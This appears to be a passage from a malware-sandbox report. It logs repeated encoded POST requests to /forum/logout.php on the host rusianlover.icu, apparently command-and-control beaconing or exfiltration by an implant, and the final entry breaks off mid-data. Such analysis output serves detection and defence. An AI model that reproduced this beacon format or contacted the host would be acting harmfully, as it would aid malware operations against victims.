mykwoa=db7bc2b8eb1d9d5d939debe534517d4ae6486c7f4a451d259045c298442162aa83a7f60c4e2d4e&kueo=60847362&ocqeymao=04ad5d2b8df48d93e98cdd82ce3584db0eaad889cef4ab3179622627842cb11e572e3c0f07c89e06bcd150c425aed9a9d5c62b256e9740234b80da502a1e46e0de4c5d40c261985255d9399ebf5968cc54d9b0575e56f90b7e55139b20bfdd3acbdd6a4691260376c1db4e09545e9339b5799729eff795d4eac63a835892fc7973944ad025a317996c0424efcd96e0ba71e9547fed254d83f8040cc659315500ac5a066a550cd6d3000409b861cd97d6b0ece725397f308a41296363f699e0c49ca23e14b9851e0fd76536154adf25cc9fc1110a3c4757f4d702083014fa90b55ce9a389b8dcbe7633b717a1d5df2a191816d99f180ca4fbddf358b10f9647c77cbe8310bd4a02e190c25b6d6baf8086cf24ef9f96
Source: global traffic	HTTP traffic detected: POST /forum/logout.php?id=1809723 HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: rusianlover.icuContent-Length: 664Cache-Control: no-cacheData Raw: 78 75 72 6f 6c 3d 32 31 36 30 36 31 32 37 26 7a 79 78 77 76 75 74 3d 37 30 42 34 32 32 31 39 31 43 31 38 45 43 42 32 46 37 43 38 38 45 30 43 34 44 46 36 42 30 43 42 39 45 35 37 38 34 30 41 35 36 32 45 34 43 26 62 63 64 65 66 67 68 69 6a 3d 41 35 45 38 34 38 44 38 42 41 45 43 46 37 34 32 36 37 36 45 35 34 44 35 44 36 39 37 46 41 36 43 46 34 37 42 41 37 42 31 38 41 38 35 43 45 35 37 32 32 45 42 43 32 41 31 35 41 31 45 36 43 30 45 44 31 39 39 37 33 46 39 30 39 37 38 39 44 32 31 36 32 35 35 43 45 33 42 30 30 42 46 41 43 33 43 45 46 46 36 35 30 46 39 44 34 38 42 45 46 43 36 30 42 43 45 44 33 35 35 34 44 32 36 39 43 42 46 31 41 33 36 36 32 36 33 34 30 37 42 44 34 41 31 31 41 42 35 31 37 30 33 43 45 42 46 35 31 42 46 42 46 45 36 37 42 42 42 42 36 46 39 31 38 44 42 39 46 45 31 44 39 34 35 39 35 31 42 35 44 45 35 32 39 33 46 38 31 36 37 32 36 41 31 42 32 36 39 46 31 43 38 41 44 30 41 43 41 42 35 34 34 43 45 44 34 35 36 43 31 41 37 36 42 34 46 31 46 44 39 46 38 46 43 44 31 41 45 45 38 41 38 36 34 43 37 36 36 31 36 30 42 37 43 43 46 39 30 44 38 41 33 32 36 38 30 31 39 39 31 42 44 33 46 30 38 46 30 34 37 31 32 41 31 43 30 46 33 37 33 34 33 34 32 42 32 43 36 31 37 44 35 37 33 41 44 41 31 35 42 46 31 42 34 30 45 45 38 45 38 30 44 32 42 34 41 32 44 41 38 39 38 46 41 42 36 35 41 44 43 39 41 41 36 38 41 39 34 41 39 32 31 33 41 32 46 43 45 36 35 46 36 39 37 37 45 42 33 38 41 41 45 41 34 30 30 45 36 34 36 30 35 38 41 39 44 39 37 39 34 30 45 34 32 46 39 43 30 32 44 35 45 30 38 33 35 44 46 46 46 37 34 38 38 39 42 34 37 36 43 43 34 36 45 34 45 33 36 31 38 45 37 30 38 37 45 38 35 44 44 39 39 44 33 36 31 46 39 45 34 39 34 42 46 30 38 42 31 39 42 38 36 32 42 42 46 45 41 43 42 45 45 45 37 41 38 45 36 41 43 36 30 34 39 30 35 31 39 45 34 33 30 31 38 30 31 33 31 30 43 42 33 31 33 43 32 36 42 36 46 33 36 46 38 31 37 44 35 34 30 46 41 32 35 36 34 37 35 31 46 30 45 33 44 46 43 32 46 35 39 45 44 31 38 35 37 43 45 46 38 45 32 44 32 44 42 36 46 43 39 44 41 46 43 36 46 31 32 31 35 31 42 30 36 Data Ascii: xurol=21606127&zyxwvut=70B422191C18ECB2F7C88E0C4DF6B0CB9E57840A562E4C&bcdefghij=A5E848D8BAECF742676E54D5D697FA6CF47BA7B18A85CE5722EBC2A15A1E6C0ED19973F909789D216255CE3B00BFAC3CEFF650F9D48BEFC60BCED3554D269CBF1A366263407BD4A11AB51703CEBF51BFBFE67BBBB6F918DB9FE1D945951B5DE5293F816726A1B269F1C8AD0ACAB544CED456C1A76B4F1FD9F8FCD1AEE8A864C766160B7CCF90D8A326801991BD3F08F04712A1C0F3734342B2C617D573ADA15BF1B40EE8E80D2B4A2DA898FAB65ADC9AA68A94A9213A2FCE65F6977EB38AAEA400E646058A9D97940E42F9C02D5E0835DFFF74889B476CC46E4E3618E7087E85DD99D361F9E494BF08B19B862BBFEACBEEE7A8E6AC60490519E4301801310CB313C26B6F36F817D540FA2564751F0E3DFC2F59ED1857CEF8E2D2DB6FC9DAFC6F12151B06
Source: global traffic	HTTP traffic detected: POST /forum/logout.php?page=83 HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: rusianlover.icuContent-Length: 644Cache-Control: no-cacheData Raw: 76 77 78 79 74 75 76 77 72 3d 36 39 31 36 36 35 37 31 26 78 61 64 67 64 3d 36 64 36 37 64 32 36 36 33 37 34 35 61 32 63 63 32 37 32 64 31 35 65 65 31 38 26 7a 65 6a 6f 6e 73 78 3d 32 46 31 30 30 35 38 32 35 39 34 32 34 42 32 34 39 39 35 33 42 39 32 41 32 45 38 31 32 33 34 41 43 33 45 33 41 35 33 35 42 37 32 42 39 44 46 43 39 32 39 45 42 44 38 33 43 45 46 38 36 44 34 39 32 31 38 36 45 45 41 44 41 41 34 36 33 43 31 46 31 37 36 32 37 46 39 32 34 35 37 42 31 42 43 34 34 46 42 45 33 44 30 30 43 33 41 41 30 30 42 31 46 42 44 41 39 35 44 46 34 31 35 39 38 41 46 32 33 39 38 46 42 43 37 45 42 32 36 33 42 33 39 43 32 39 34 38 37 43 34 45 30 46 43 31 34 33 32 44 34 34 44 45 45 43 37 34 30 43 36 39 32 33 46 46 36 45 41 44 33 44 34 30 44 39 31 44 43 35 38 43 36 38 44 31 36 42 42 43 36 46 32 36 36 42 37 39 43 43 43 32 35 31 45 37 43 41 35 42 30 43 39 38 33 34 34 30 43 31 31 34 32 33 30 33 32 43 46 34 33 36 42 46 38 38 37 35 32 38 37 33 30 46 46 32 31 41 42 37 45 39 32 38 43 43 42 34 38 44 46 45 32 46 41 33 45 42 36 34 34 33 37 34 36 30 38 32 45 35 39 35 31 33 42 32 34 43 42 43 33 30 43 32 41 32 46 33 30 31 44 36 46 31 32 32 44 41 32 41 30 39 41 38 34 35 33 36 30 30 36 36 42 33 41 39 32 34 32 34 42 33 34 33 39 34 36 46 44 38 46 44 42 36 46 35 37 30 31 35 44 31 42 32 35 38 46 43 41 44 39 37 36 33 42 46 36 34 39 38 33 35 35 33 32 34 35 45 36 31 35 41 43 31 32 33 38 38 31 30 30 44 46 43 45 39 33 38 44 34 38 31 32 46 42 31 45 34 39 42 31 36 46 43 34 44 43 34 41 41 46 43 46 34 34 37 46 39 43 42 35 38 36 30 42 42 41 46 43 38 35 42 32 32 41 32 43 30 32 36 43 31 31 41 38 30 36 34 43 32 42 32 32 32 38 45 30 34 34 45 36 37 41 31 30 39 45 31 41 37 30 37 39 39 35 45 36 38 38 36 41 44 38 39 36 31 38 43 39 34 36 32 30 42 39 39 35 34 30 43 43 34 31 41 32 37 44 42 41 45 32 30 44 42 43 38 33 34 37 36 34 36 36 42 45 30 42 32 44 32 46 30 31 39 34 33 30 46 34 31 46 42 31 45 41 36 46 33 33 35 43 38 46 32 39 30 44 37 45 43 39 36 39 45 Data Ascii: vwxytuvwr=69166571&xadgd=6d67d2663745a2cc272d15ee18&zejonsx=2F10058259424B249953B92A2E81234AC3E3A535B72B9DFC929EBD83CEF86D492186EEADAA463C1F17627F92457B1BC44FBE3D00C3AA00B1FBDA95DF41598AF2398FBC7EB263B39C29487C4E0FC1432D44DEEC740C6923FF6EAD3D40D91DC58C68D16BBC6F266B79CCC251E7CA5B0C983440C11423032CF436BF887528730FF21AB7E928CCB48DFE2FA3EB6443746082E59513B24CBC30C2A2F301D6F122DA2A09A845360066B3A92424B343946FD8FDB6F57015D1B258FCAD9763BF64983553245E615AC12388100DFCE938D4812FB1E49B16FC4DC4AAFCF447F9CB5860BBAFC85B22A2C026C11A8064C2B2228E044E67A109E1A707995E6886AD89618C94620B99540CC41A27DBAE20DBC83476466BE0B2D2F019430F41FB1EA6F335C8F290D7EC969E
Source: global traffic	HTTP traffic detected: POST /forum/logout.php?id=2140088 HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: rusianlover.icuContent-Length: 679Cache-Control: no-cacheData Raw: 6f 69 63 77 71 6b 3d 32 39 34 33 35 31 36 32 26 71 6d 69 65 61 77 73 69 3d 35 33 65 39 36 35 66 38 32 33 38 36 66 64 34 38 66 38 30 35 35 33 63 31 65 31 30 66 36 64 38 65 31 35 37 37 65 36 31 32 30 64 36 39 31 35 61 32 31 39 36 66 63 31 66 32 38 66 32 61 33 38 38 64 26 73 71 6f 6d 3d 41 44 41 32 46 44 34 36 34 38 43 43 36 36 46 37 33 36 45 45 42 42 42 42 33 35 30 35 32 31 36 39 31 31 34 31 43 37 43 39 44 44 35 38 46 38 44 30 31 42 43 39 37 32 30 46 33 37 46 30 30 44 42 30 41 39 42 30 44 38 37 41 36 45 44 38 46 41 37 44 39 30 39 41 35 31 39 34 41 31 36 33 32 33 31 42 33 35 46 35 43 41 46 31 37 35 30 45 31 31 36 41 41 39 42 43 44 32 35 37 36 41 31 34 42 39 32 36 44 32 46 46 36 36 44 42 35 35 38 44 30 41 36 39 33 43 43 35 39 39 30 42 35 41 39 36 32 32 34 45 46 31 34 43 42 39 38 31 33 37 31 30 38 37 30 39 33 33 42 30 38 33 43 44 42 39 32 46 30 32 43 39 44 41 35 43 34 32 42 32 43 46 39 45 30 39 44 33 36 35 34 42 43 35 44 41 42 39 41 34 32 37 41 37 36 35 44 45 43 46 45 42 33 39 42 33 41 34 37 31 45 42 32 38 37 38 30 34 33 33 38 31 31 33 31 36 43 32 34 46 44 42 35 34 42 32 46 38 38 46 45 35 33 31 33 42 35 45 41 30 37 36 45 35 44 41 44 41 38 38 39 33 39 31 45 35 46 34 35 31 30 35 37 45 43 44 38 33 38 31 38 32 39 46 34 41 35 45 35 33 38 39 32 45 30 35 38 37 37 46 32 31 32 37 41 36 32 33 46 43 38 42 45 38 30 43 34 41 43 37 35 45 35 32 33 36 38 42 42 44 31 30 41 34 31 35 31 34 37 42 36 35 38 35 31 41 38 43 38 30 33 42 34 35 41 43 37 30 31 32 34 42 32 32 39 37 32 34 35 35 43 37 38 43 34 36 44 43 45 32 31 34 39 39 33 31 31 46 45 44 38 45 36 38 33 31 35 33 42 44 41 33 38 34 30 41 44 41 44 46 33 38 33 39 34 45 42 35 37 32 36 33 37 36 46 38 45 30 33 46 30 32 46 38 36 43 35 38 46 36 35 39 33 39 31 46 43 39 31 34 39 44 39 38 41 34 38 41 33 42 31 38 43 35 39 32 45 36 44 46 44 36 42 36 38 45 43 38 36 35 36 37 34 46 45 44 38 31 46 32 39 41 36 34 37 46 38 33 43 30 36 34 42 42 34 33 34 44 37 31 32 42 35 32 33 34 33 34 42 36 32 35 39 46 34 46 45 36 35 36 41 30 44 37 33 30 30 45 36 30 37 39 41 31 36 45 36 35 38 32 39 43 46 37 Data Ascii: oicwqk=29435162&qmieawsi=53e965f82386fd48f80553c1e10f6d8e1577e6120d6915a2196fc1f28f2a388d&sqom=ADA2FD4648CC66F736EEBBBB350521691141C7C9DD58F8D01BC9720F37F00DB0A9B0D87A6ED8FA7D909A5194A163231B35F5CAF1750E116AA9BCD2576A14B926D2FF66DB558D0A693CC5990B5A96224EF14CB9813710870933B083CDB92F02C9DA5C42B2CF9E09D3654BC5DAB9A427A765DECFEB39B3A471EB28780433811316C24FDB54B2F88FE5313B5EA076E5DADA889391E5F451057ECD8381829F4A5E53892E05877F2127A623FC8BE80C4AC75E52368BBD10A415147B65851A8C803B45AC70124B22972455C78C46DCE21499311FED8E683153BDA3840ADADF38394EB5726376F8E03F02F86C58F659391FC9149D98A48A3B18C592E6DFD6B68EC865674FED81F29A647F83C064BB434D712B523434B6259F4FE656A0D7300E6079A16E65829CF7
Source: global traffic	HTTP traffic detected: POST /forum/logout.php?id=9885598 HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: rusianlover.icuContent-Length: 646Cache-Control: no-cacheData Raw: 7a 65 6a 6f 74 3d 35 39 39 37 35 34 38 35 26 62 69 70 77 64 6b 72 3d 43 45 33 42 36 34 37 42 32 45 41 35 41 36 31 43 31 31 37 31 46 30 32 44 39 37 34 32 26 64 6d 76 65 6e 77 66 6f 78 3d 35 46 33 30 41 46 45 41 30 39 43 44 38 33 42 38 43 32 44 35 34 38 45 30 35 38 31 39 46 45 43 44 33 37 41 34 33 30 38 43 43 36 42 30 43 34 42 39 36 44 45 32 31 38 30 45 38 35 34 32 45 45 35 31 43 30 39 46 46 32 37 44 45 46 37 30 36 32 45 34 43 44 30 37 43 36 33 45 45 33 46 37 39 35 46 38 37 37 33 42 35 35 37 41 45 42 38 39 46 33 46 46 41 38 44 36 37 44 31 42 46 43 36 32 36 37 33 44 30 33 37 39 46 36 42 37 38 34 34 33 43 35 41 31 46 46 30 44 30 34 37 36 35 34 36 43 41 35 30 37 46 33 43 41 44 37 36 33 35 46 45 35 37 43 41 35 43 45 39 37 38 46 42 41 30 37 36 30 45 37 45 38 42 41 42 36 32 43 35 39 42 32 37 45 33 44 36 45 37 41 36 38 42 41 39 45 38 34 37 42 35 42 32 30 42 37 43 41 44 36 37 45 39 41 35 43 44 45 35 45 37 37 35 43 45 39 35 45 34 39 46 46 36 39 31 35 36 30 46 31 38 38 46 44 30 35 45 32 35 42 44 42 35 39 37 32 33 41 36 35 34 41 33 32 30 44 41 39 42 39 37 41 42 30 44 34 43 35 35 45 36 43 32 34 31 38 33 42 41 36 33 36 36 45 44 42 39 30 44 46 41 38 39 41 31 45 32 44 37 35 32 33 30 36 38 46 30 32 41 32 46 37 37 42 31 43 33 35 39 45 31 33 37 32 34 36 42 41 30 36 35 32 34 46 46 37 46 34 44 44 39 36 44 32 45 44 43 41 33 43 37 32 30 43 41 37 43 32 32 46 30 46 34 44 46 33 45 35 44 37 35 32 37 45 44 30 34 41 39 33 33 31 42 44 44 34 31 44 31 36 30 45 39 36 45 32 33 44 35 34 45 46 37 32 43 36 43 46 38 44 38 33 37 45 32 43 31 46 30 44 33 32 35 36 42 30 35 41 45 31 45 41 34 32 42 37 44 44 30 46 34 34 38 30 41 36 41 38 42 46 41 32 36 39 31 43 33 44 31 38 44 38 34 36 31 46 32 36 38 33 37 31 32 46 45 35 42 37 46 32 32 36 37 35 45 38 38 43 45 30 33 34 36 43 41 35 42 31 36 34 37 35 38 34 35 36 35 43 44 33 34 33 42 32 35 45 30 44 38 31 41 45 46 33 34 34 42 31 31 43 43 32 43 44 43 35 42 42 32 32 43 42 41 31 42 41 38 35 36 44 35 37 32 35 Data Ascii: zejot=59975485&bipwdkr=CE3B647B2EA5A61C1171F02D9742&dmvenwfox=5F30AFEA09CD83B8C2D548E05819FECD37A4308CC6B0C4B96DE2180E8542EE51C09FF27DEF7062E4CD07C63EE3F795F8773B557AEB89F3FFA8D67D1BFC62673D0379F6B78443C5A1FF0D0476546CA507F3CAD7635FE57CA5CE978FBA0760E7E8BAB62C59B27E3D6E7A68BA9E847B5B20B7CAD67E9A5CDE5E775CE95E49FF691560F188FD05E25BDB59723A654A320DA9B97AB0D4C55E6C24183BA6366EDB90DFA89A1E2D7523068F02A2F77B1C359E137246BA06524FF7F4DD96D2EDCA3C720CA7C22F0F4DF3E5D7527ED04A9331BDD41D160E96E23D54EF72C6CF8D837E2C1F0D3256B05AE1EA42B7DD0F4480A6A8BFA2691C3D18D8461F2683712FE5B7F22675E88CE0346CA5B1647584565CD343B25E0D81AEF344B11CC2CDC5BB22CBA1BA856D5725
Source: global traffic	HTTP traffic detected: POST /forum/logout.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: rusianlover.icuContent-Length: 692Cache-Control: no-cacheData Raw: 78 61 64 61 64 67 6a 3d 45 38 33 30 42 44 43 36 43 34 46 37 36 46 33 35 42 35 45 33 39 45 33 31 38 41 37 38 45 32 31 30 32 37 41 30 38 35 31 31 41 35 30 35 42 30 31 34 42 41 34 42 33 45 33 43 36 37 37 46 36 46 36 45 33 46 45 45 30 44 46 32 35 33 26 76 77 78 73 74 3d 36 39 30 34 36 34 34 31 26 7a 65 6a 69 6e 73 78 77 62 3d 30 38 63 30 66 39 37 33 32 65 64 65 63 37 37 64 30 33 64 63 64 65 39 30 65 36 63 38 34 32 35 34 36 35 34 63 37 31 31 35 33 62 63 62 30 39 33 62 30 63 62 63 62 63 39 30 62 36 35 65 62 63 32 35 33 62 34 38 65 37 63 66 63 36 37 63 63 38 31 34 36 32 37 31 32 36 32 37 30 36 35 36 66 36 37 36 35 34 35 62 63 30 38 34 62 32 38 35 30 31 32 35 64 31 62 38 61 39 32 61 65 63 65 39 65 66 39 62 39 35 38 36 34 64 32 66 61 65 33 31 39 64 64 33 62 39 38 36 61 65 32 35 33 33 31 33 31 61 65 34 61 34 64 34 33 39 35 36 33 32 36 32 66 64 66 35 32 64 31 66 61 62 65 65 31 61 31 61 34 33 31 61 66 66 31 35 35 61 38 34 63 35 34 31 33 35 31 37 38 64 61 61 39 37 39 37 31 66 33 33 36 39 62 64 34 33 65 32 33 63 31 31 34 65 61 33 34 39 37 36 37 64 39 66 61 38 30 64 38 34 37 31 66 63 61 32 35 62 65 66 33 65 61 36 39 36 39 66 62 37 37 38 63 66 39 66 39 31 38 35 31 63 32 38 36 66 38 64 33 33 39 38 30 37 38 30 31 65 63 35 34 35 31 35 63 32 61 31 61 35 36 34 32 31 39 36 62 33 63 63 36 64 36 38 36 38 33 33 34 30 39 36 66 37 32 61 35 32 39 33 33 31 62 31 30 36 61 31 39 33 62 64 30 63 64 66 39 61 36 33 30 66 61 31 64 35 36 34 39 37 65 63 64 35 37 36 36 36 64 37 65 64 31 30 65 63 61 33 64 35 36 61 38 39 63 33 39 66 63 62 37 66 36 32 61 34 32 32 33 31 63 31 33 62 31 31 66 61 32 31 63 39 62 64 36 38 34 36 34 31 33 34 34 33 30 64 63 62 37 38 34 32 64 37 64 37 37 63 35 38 34 32 62 35 66 33 39 63 35 39 39 38 36 62 34 35 62 63 34 37 62 31 61 63 38 33 61 34 34 33 63 32 64 30 33 31 38 62 65 37 63 63 38 62 31 30 31 34 64 34 31 66 37 34 33 31 39 63 36 38 66 35 61 30 30 33 65 34 64 64 32 39 30 33 36 33 66 37 33 32 63 33 36 66 63 66 66 64 36 35 32 34 33 34 65 66 63 30 30 63 36 37 37 33 32 39 63 37 64 65 36 64 39 34 31 37 64 32 36 33 64 37 34 33 65 64 39 62 30 62 38 61 35 32 Data Ascii: xadadgj=E830BDC6C4F76F35B5E39E318A78E21027A08511A505B014BA4B3E3C677F6F6E3FEE0DF253&vwxst=69046441&zejinsxwb=08c0f9732edec77d03dcde90e6c84254654c71153bcb093b0cbcbc90b65ebc253b48e7cfc67cc814627126270656f676545bc084b2850125d1b8a92aece9ef9b95864d2fae319dd3b986ae2533131ae4a4d439563262fdf52d1fabee1a1a431aff155a84c54135178daa97971f3369bd43e23c114ea349767d9fa80d8471fca25bef3ea6969fb778cf9f91851c286f8d339807801ec54515c2a1a5642196b3cc6d6868334096f72a529331b106a193bd0cdf9a630fa1d56497ecd57666d7ed10eca3d56a89c39fcb7f62a42231c13b11fa21c9bd68464134430dcb7842d7d77c5842b5f39c59986b45bc47b1ac83a443c2d0318be7cc8b1014d41f74319c68f5a003e4dd290363f732c36fcffd652434efc00c677329c7
Source: global traffic	HTTP traffic detected: POST /forum/logout.php?page=1 HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: rusianlover.icuContent-Length: 635Cache-Control: no-cacheData Raw: 73 71 6f 6d 6b 69 61 79 3d 37 32 36 63 39 34 31 65 32 34 35 64 65 39 36 36 64 38 64 65 26 71 6d 69 65 61 77 3d 34 37 33 36 33 31 33 38 26 75 75 75 75 3d 32 36 36 44 44 30 36 43 42 37 42 36 39 43 38 35 43 31 32 34 41 33 31 33 38 30 34 32 38 31 46 35 45 45 31 46 39 36 35 46 32 37 42 46 37 44 46 45 31 39 38 37 35 37 43 42 43 36 43 46 38 45 34 33 41 46 41 41 36 38 34 43 35 41 43 46 30 38 44 35 36 34 37 31 31 35 36 46 39 38 30 38 46 46 36 39 33 30 43 42 39 32 43 36 31 37 45 39 30 33 30 42 31 36 42 31 41 41 45 43 33 33 31 37 30 33 35 32 37 33 33 31 36 38 37 44 31 42 42 35 31 39 35 30 44 33 44 36 37 37 37 32 35 45 32 34 30 36 33 32 34 45 46 37 42 37 38 46 46 34 41 35 32 37 41 38 37 45 42 46 39 44 46 45 35 30 35 39 46 42 33 35 34 38 32 44 39 30 30 31 35 41 32 35 39 41 31 36 38 35 36 37 43 38 32 45 38 35 42 43 32 41 36 37 30 44 46 32 45 46 39 39 31 31 45 36 41 41 45 33 37 37 30 30 31 42 33 35 34 30 41 39 46 38 35 45 38 30 36 37 43 31 42 45 41 31 32 30 34 38 45 35 32 39 45 41 41 46 35 41 46 42 34 35 33 30 42 35 32 32 45 31 33 44 30 35 45 43 39 46 32 36 33 34 41 30 44 38 34 30 38 31 41 39 34 46 42 42 42 39 44 32 41 35 30 32 41 41 37 44 30 41 35 34 32 41 32 32 37 30 34 35 43 46 35 39 46 45 37 38 35 46 36 30 34 39 46 45 41 38 46 34 35 36 38 31 30 38 34 32 30 43 36 33 38 43 35 42 31 44 42 45 42 33 34 46 35 31 46 33 41 37 31 35 44 35 35 33 31 42 38 30 45 45 45 35 45 37 35 30 46 35 41 33 32 37 30 44 32 45 44 34 30 38 42 30 31 34 39 43 30 45 32 46 37 38 31 30 43 34 39 30 30 42 35 43 45 39 30 33 45 37 42 44 43 32 36 41 39 35 30 33 32 32 37 41 46 33 33 41 38 34 38 38 41 41 35 37 36 32 34 42 42 33 46 34 30 45 45 42 43 30 34 34 35 44 41 45 33 32 46 41 36 38 33 39 41 42 34 44 39 35 46 44 43 34 34 44 37 45 34 44 44 43 43 45 32 34 41 46 33 41 33 41 43 33 37 44 46 42 34 30 42 36 33 36 39 43 32 33 35 41 39 46 37 39 38 35 43 31 41 32 43 32 35 39 38 32 41 30 32 42 38 44 41 41 36 34 43 43 32 31 41 31 Data Ascii: sqomkiay=726c941e245de966d8de&qmieaw=47363138&uuuu=266DD06CB7B69C85C124A313804281F5EE1F965F27BF7DFE198757CBC6CF8E43AFAA684C5ACF08D56471156F9808FF6930CB92C617E9030B16B1AAEC331703527331687D1BB51950D3D677725E2406324EF7B78FF4A527A87EBF9DFE5059FB35482D90015A259A168567C82E85BC2A670DF2EF9911E6AAE377001B3540A9F85E8067C1BEA12048E529EAAF5AFB4530B522E13D05EC9F2634A0D84081A94FBBB9D2A502AA7D0A542A227045CF59FE785F6049FEA8F4568108420C638C5B1DBEB34F51F3A715D5531B80EEE5E750F5A3270D2ED408B0149C0E2F7810C4900B5CE903E7BDC26A9503227AF33A8488AA57624BB3F40EEBC0445DAE32FA6839AB4D95FDC44D7E4DDCCE24AF3A3AC37DFB40B6369C235A9F7985C1A2C25982A02B8DAA64CC21A1
Source: global traffic	HTTP traffic detected: POST /forum/logout.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: rusianlover.icuContent-Length: 649Cache-Control: no-cacheData Raw: 6f 63 71 65 73 67 75 69 3d 44 38 31 32 42 33 42 30 45 41 33 33 45 45 43 30 46 38 33 32 34 31 46 45 41 45 38 42 31 32 41 37 36 37 26 6d 79 6b 77 69 75 3d 35 35 33 32 30 31 31 36 26 71 67 77 6d 3d 34 44 31 42 43 33 36 35 36 35 39 38 30 42 32 43 34 41 31 45 38 42 35 46 43 30 36 44 45 43 32 41 46 38 41 38 38 33 37 36 43 30 41 43 31 39 38 34 34 43 44 38 41 43 37 33 38 37 34 43 44 41 32 34 31 44 35 34 34 33 34 38 33 37 33 35 44 31 46 37 34 30 33 31 30 32 35 45 41 39 30 44 38 37 33 37 46 35 38 35 41 31 35 30 43 35 34 34 46 42 31 43 33 38 35 36 30 36 43 42 45 34 32 43 46 43 46 32 39 38 33 39 32 46 38 44 42 43 37 30 43 37 37 31 38 36 35 36 45 36 41 41 32 44 45 34 41 44 30 46 41 30 33 45 31 30 31 35 36 32 34 43 37 31 46 33 41 32 44 34 39 30 43 32 36 42 43 39 39 46 39 31 42 32 43 39 32 37 43 43 33 38 39 46 30 39 35 43 44 35 34 38 37 33 34 36 38 42 39 42 37 45 41 33 30 36 44 39 39 36 36 39 37 30 43 30 37 32 41 38 35 45 39 32 41 34 38 33 36 43 33 30 39 41 42 45 43 45 41 38 38 44 44 45 41 46 37 30 37 46 38 41 33 38 34 43 33 44 36 30 45 31 35 37 43 35 31 39 34 38 32 35 38 30 37 37 33 41 32 38 37 31 34 33 39 32 38 42 32 35 31 44 39 46 34 39 35 34 35 36 44 39 32 31 30 46 36 30 39 32 37 42 36 45 46 43 34 38 36 45 33 42 37 38 31 46 41 41 42 33 32 34 46 42 45 41 46 31 46 32 33 31 46 30 33 37 43 33 34 33 31 46 41 36 36 36 39 44 45 46 31 46 42 31 41 32 41 30 36 46 35 36 37 38 44 41 36 44 44 36 41 31 42 31 41 34 36 33 43 37 37 38 43 44 38 46 44 33 34 30 42 43 44 37 33 41 39 43 35 32 44 41 36 37 34 35 44 30 35 31 38 35 45 38 34 38 33 46 30 36 41 41 36 32 44 36 41 37 30 45 43 31 45 39 30 41 43 33 44 35 31 45 41 32 31 44 44 41 31 46 30 41 33 33 31 45 44 41 36 39 33 38 38 42 39 38 44 31 31 45 42 37 41 37 44 43 44 30 30 37 42 37 35 34 36 42 45 45 34 39 45 45 41 35 33 34 39 38 44 45 31 45 45 34 39 32 36 46 41 35 43 43 38 43 46 37 39 44 31 30 39 44 38 42 39 36 33 33 34 38 35 37 32 45 42 30 30 43 32 30 37 42 33 34 42 44 38 37 34 42 37 35 36 37 Data Ascii: ocqesgui=D812B3B0EA33EEC0F83241FEAE8B12A767&mykwiu=55320116&qgwm=4D1BC36565980B2C4A1E8B5FC06DEC2AF8A88376C0AC19844CD8AC73874CDA241D5443483735D1F74031025EA90D8737F585A150C544FB1C385606CBE42CFCF298392F8DBC70C7718656E6AA2DE4AD0FA03E1015624C71F3A2D490C26BC99F91B2C927CC389F095CD54873468B9B7EA306D9966970C072A85E92A4836C309ABECEA88DDEAF707F8A384C3D60E157C519482580773A287143928B251D9F495456D9210F60927B6EFC486E3B781FAAB324FBEAF1F231F037C3431FA6669DEF1FB1A2A06F5678DA6DD6A1B1A463C778CD8FD340BCD73A9C52DA6745D05185E8483F06AA62D6A70EC1E90AC3D51EA21DDA1F0A331EDA69388B98D11EB7A7DCD007B7546BEE49EEA53498DE1EE4926FA5CC8CF79D109D8B963348572EB00C207B34BD874B7567
Source: global traffic	HTTP traffic detected: POST /forum/logout.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: rusianlover.icuContent-Length: 671Cache-Control: no-cacheData Raw: 73 6b 69 61 3d 32 34 44 46 46 32 37 35 37 46 43 35 45 32 34 38 32 43 36 32 42 36 36 45 39 46 32 44 33 45 44 36 37 30 34 43 38 39 31 45 32 30 33 46 45 41 37 44 46 46 42 30 42 38 36 32 26 71 67 63 73 69 65 75 71 3d 31 39 33 33 34 33 35 36 26 75 6f 6f 69 63 63 3d 33 45 36 37 38 39 37 46 42 31 45 39 43 45 32 31 34 41 41 36 37 32 41 32 31 42 35 38 35 41 34 42 39 32 34 37 33 37 34 31 37 34 46 44 34 38 45 32 32 34 44 45 31 33 30 38 37 44 41 33 44 44 32 45 45 39 35 43 41 41 35 42 44 31 37 30 43 39 32 31 39 37 42 32 30 31 41 38 34 43 41 36 44 36 31 42 45 45 31 36 45 38 43 46 33 44 39 42 33 34 46 35 35 45 34 43 37 34 38 43 45 42 41 43 37 39 34 34 34 38 43 46 45 44 39 33 43 39 35 30 42 32 36 34 32 39 46 36 39 43 41 38 39 36 46 44 36 35 35 42 38 37 30 44 32 37 42 38 32 35 34 38 41 32 46 44 34 44 37 44 44 32 32 33 35 34 39 32 37 36 37 36 42 45 43 32 41 30 36 30 37 39 46 32 38 42 44 33 32 45 32 39 44 33 34 44 35 31 32 34 43 37 46 34 42 38 37 38 45 32 45 32 35 35 35 33 38 41 38 32 45 45 33 39 39 41 32 44 46 44 38 31 36 46 46 39 42 38 35 31 31 43 35 30 34 45 36 46 39 30 34 33 33 45 31 36 38 41 34 43 36 34 42 31 32 45 44 45 44 45 31 32 32 31 41 46 39 34 41 42 35 41 43 43 36 41 30 45 32 33 32 36 43 34 31 37 37 32 39 43 37 34 38 39 32 36 32 39 35 41 41 43 45 41 34 46 46 34 43 32 46 38 39 36 43 30 39 32 38 45 43 42 38 41 44 45 41 43 34 30 39 34 46 37 45 43 43 43 31 38 35 45 37 36 38 37 39 31 37 38 45 46 45 42 